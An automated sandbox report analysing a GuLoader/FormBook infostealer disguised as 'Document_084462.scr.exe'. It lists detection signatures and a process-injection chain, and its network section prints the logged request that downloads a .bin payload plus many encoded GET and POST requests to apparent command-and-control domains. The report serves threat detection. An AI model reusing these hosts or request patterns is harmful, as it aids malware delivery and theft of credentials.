Windows Analysis Report
Document_084462.scr.exe

Overview

General Information

Sample name: Document_084462.scr.exe
Analysis ID: 1567687
MD5: b4e362177a0e0836dd04831fe456255b
SHA1: de7a47519e45386fd0b0f2ff4ab6fbdb5b81716e
SHA256: 0ccf347c204f022f6cf118c653ccb248e41cfc71593217b9ed5bfc7ef13fcbc7

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Document_084462.scr.exe (PID: 1684 cmdline: "C:\Users\user\Desktop\Document_084462.scr.exe" MD5: B4E362177A0E0836DD04831FE456255B)
    • Document_084462.scr.exe (PID: 3396 cmdline: "C:\Users\user\Desktop\Document_084462.scr.exe" MD5: B4E362177A0E0836DD04831FE456255B)
      • RAVCpl64.exe (PID: 7608 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • waitfor.exe (PID: 8112 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • firefox.exe (PID: 6276 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.13274829512.00000000067E0000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000000.00000002.12951622773.0000000009B40000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

No Sigma rule has matched

AV Detection

Source: Document_084462.scr.exe, ReversingLabs: Detection: 34%
Source: Yara match, File source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Document_084462.scr.exe, Joe Sandbox ML: detected
Source: Document_084462.scr.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 122.201.127.17:443 -> 192.168.11.20:49748 version: TLS 1.2
Source: Document_084462.scr.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: waitfor.pdbGCTL source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: waitfor.pdb source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Document_084462.scr.exe, Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe
Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_00402902 FindFirstFileW,0_2_00402902
Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 4x nop then mov ebx, 00000004h 1_2_001204CE
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 4x nop then mov ebx, 00000004h 2_2_034E34CE
Source: C:\Windows\SysWOW64\waitfor.exe, Code function: 4x nop then mov ebx, 00000004h 3_2_04D904CE

Networking

            Source: DNS query: www.optimismbank.xyz
            Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
            Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49748 -> 122.201.127.17:443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:56:07 GMTserver: Apacheset-cookie: __tad=1733248567.7025274; expires=Fri, 01-Dec-2034 17:56:07 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:56:10 GMTserver: Apacheset-cookie: __tad=1733248570.8813292; expires=Fri, 01-Dec-2034 17:56:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:56:13 GMTserver: Apacheset-cookie: __tad=1733248573.2895854; expires=Fri, 01-Dec-2034 17:56:13 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:59:44 GMTserver: Apacheset-cookie: __tad=1733248784.2117578; expires=Fri, 01-Dec-2034 17:59:44 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:59:47 GMTserver: Apacheset-cookie: __tad=1733248787.4845084; expires=Fri, 01-Dec-2034 17:59:47 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:59:50 GMTserver: Apacheset-cookie: __tad=1733248790.1701818; expires=Fri, 01-Dec-2034 17:59:50 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: GET /hEuJhxvbfOcCGqtagtOtF215.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: babalharra.com.auCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.thaor56.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.xcvbj.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hxi5/?2O=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.jcsa.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /j8pv/?ChhG6=J-xs&2O=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8gp4/?ChhG6=J-xs&2O=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.rgenerousrs.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /cpit/?2O=sqrCCcTnmzrg1P4sAk/QU75pr5UiXpEX3HrYYQRUrHENwAM+UA+gtHvn9s/6e57/pGZInJKN/XxZ2ntAsziA3/X4179OogJSAfxe5UAmetVNY4oSlmiuZpQ=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bpgroup.siteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: babalharra.com.au
            Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
            Source: global trafficDNS traffic detected: DNS query: www.optimismbank.xyz
            Source: global trafficDNS traffic detected: DNS query: www.greenthub.life
            Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
            Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
            Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
            Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
            Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
            Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
            Source: global trafficDNS traffic detected: DNS query: www.jcsa.info
            Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
            Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
            Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
            Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
            Source: global trafficDNS traffic detected: DNS query: www.aballanet.cat
            Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
            Source: unknownHTTP traffic detected: POST /98j3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeHost: www.optimismbank.xyzOrigin: http://www.optimismbank.xyzReferer: http://www.optimismbank.xyz/98j3/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:54:55 GMT
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:55:24 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:55:27 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:55:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:55:32 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Dec 2024 17:55:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Dec 2024 17:55:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Dec 2024 17:55:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Dec 2024 17:56:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:56:22 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:56:25 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:56:28 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:56:31 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:56:37 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:56:40 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:56:43 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 17:56:46 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:56:52 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 17:56:55 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
